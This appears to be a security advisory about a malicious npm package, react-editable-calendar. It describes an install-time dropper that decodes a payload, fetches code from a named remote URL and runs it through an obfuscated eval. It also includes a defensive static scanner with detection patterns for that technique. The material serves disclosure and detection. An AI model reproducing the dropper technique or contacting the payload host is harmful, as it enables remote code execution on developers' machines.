MAL-2026-6547

Malicious code in react-editable-calendar (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9b35fd7baa18320cbcaf6fbb6fbabb6139dd48264cd1f09d0461a8877c1f873f)

On `npm install`, the package's preinstall hook runs `node dist/index.d.js`. That file base64-decodes a payload which fetches JavaScript from `https://everydaynodechecker-39143n.vercel.app/api/key?mem=master` and passes the response to `eval`. The `eval` identifier is obfuscated by constructing it from character codes [101,118,97,104] and invoking it via `globalThis[tag](text)` rather than appearing as a literal in source. The result is arbitrary attacker-controlled JavaScript execution on the installer's machine at install time, from an anonymous third-party host. The package name mimics common React calendar component naming and ships empty author metadata, with a minimal dist tree whose only auto-executed code is the remote-eval dropper.
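
The install-time behaviour described above can be triaged statically, before any lifecycle script runs. The following is an added example, not code from the advisory or from the package: `auditPackage`, `scanSource` and the signal list are assumed names and heuristics, and the sample package is constructed and inert (it is only scanned as text).

```javascript
// Added example: static triage of an unpacked npm package for the install-hook
// dropper pattern in this advisory. Helper names and signals are assumptions.
const HOOKS = ["preinstall", "install", "postinstall"];
const SIGNALS = [
  ["base64-decode", /Buffer\.from\([^)]*['"]base64['"]\)|\batob\(/],
  ["charcode-string", /String\.fromCharCode\(/],
  ["dynamic-global-call", /globalThis\[[^\]]+\]\s*\(/],
  ["network-fetch", /\bfetch\(|https?\.(get|request)\(/],
  ["direct-eval", /\beval\(|new Function\(/],
];

// Scan text; also decode long base64 literals once and scan the result,
// because the advisory says the fetch/eval logic sits inside the payload.
function scanSource(text, depth = 0) {
  const hits = new Set();
  for (const [name, re] of SIGNALS) if (re.test(text)) hits.add(name);
  if (depth < 1) {
    for (const m of text.matchAll(/['"`]([A-Za-z0-9+/]{40,}={0,2})['"`]/g)) {
      const inner = Buffer.from(m[1], "base64").toString("utf8");
      for (const h of scanSource(inner, depth + 1)) hits.add("decoded:" + h);
    }
  }
  return [...hits].sort();
}

// manifest: parsed package.json; files: { relativePath: sourceText }
function auditPackage(manifest, files) {
  const findings = [];
  for (const hook of HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (!cmd) continue;
    const m = /\bnode\s+(\S+)/.exec(cmd);
    const target = m ? m[1].replace(/^\.\//, "") : null;
    findings.push({
      hook, cmd, target,
      declarationLookalike: !!target && /\.d\.js$/.test(target), // .d.ts-style name that is executed
      signals: target && files[target] !== undefined ? scanSource(files[target]) : [],
    });
  }
  return findings;
}
// Constructed, inert sample (never executed, only scanned as text).
const innerSample = 'fetch("https://example.invalid/x"); globalThis[tag](text);';
const sampleFiles = {
  "dist/index.d.js": 'const p = Buffer.from("' +
    Buffer.from(innerSample).toString("base64") + '", "base64").toString();',
};
const sampleManifest = { name: "constructed-sample", scripts: { preinstall: "node dist/index.d.js" } };
console.log(JSON.stringify(auditPackage(sampleManifest, sampleFiles), null, 2));
```

Feed it the `package.json` and files of an unpacked tarball rather than an installed tree; `npm install --ignore-scripts` keeps lifecycle hooks such as `preinstall` from running.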

Affected packages

npm / react-editable-calendar
Introduced in: 0

No fixed version published yet for react-editable-calendar (npm). Pin to a known-safe version or switch to an alternative.